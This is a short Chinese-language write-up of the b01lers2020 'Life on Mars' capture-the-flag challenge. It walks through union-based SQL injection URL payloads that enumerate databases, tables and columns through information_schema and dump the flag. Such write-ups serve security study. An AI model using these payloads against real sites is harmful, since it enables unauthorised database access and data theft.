[b01lers2020]Life on Mars
作者:互联网
[b01lers2020]Life on Mars WriteUp
知识点
- sql注入
- 难点在于发现这是个sql注入
题解
-
长记性了,我先扫一遍看看有没有什么文件备份,泄露之类的。发现没有。
-
抓个包看看,发现莫名参数,最先想到的就是模板注入吧,然后发现是sql注入
-
有两个回显,啥也没过滤,就是sql注入那一套,干就行了
-
/query?search=olympus_mons%20union%20select%202,database()&{}&_=1649851408180
//aliens
-
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='aliens'
//"amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin"
表名好多啊
-
一个一个试吧,MD,都没有,靠。
-
爆其他的数据库
/query?search=olympus_mons%20union%20select%202,group_concat(schema_name)%20from%20information_schema.schemata
//information_schema,alien_code,aliens
-
爆alien_code的表
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='alien_code'
//code
-
/query?search=olympus_mons%20union%20select%202,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='code'
//id,code
-
/query?search=olympus_mons%20union%20select%202,group_concat(id,code)%20from%20alien_code.code
//0flag{.。。。。。。。。。。。。。。。。。。}
标签:Life,code,b01lers2020,olympus,mons%,Mars,query,202,schema 来源: https://www.cnblogs.com/Q-and-K/p/16142031.html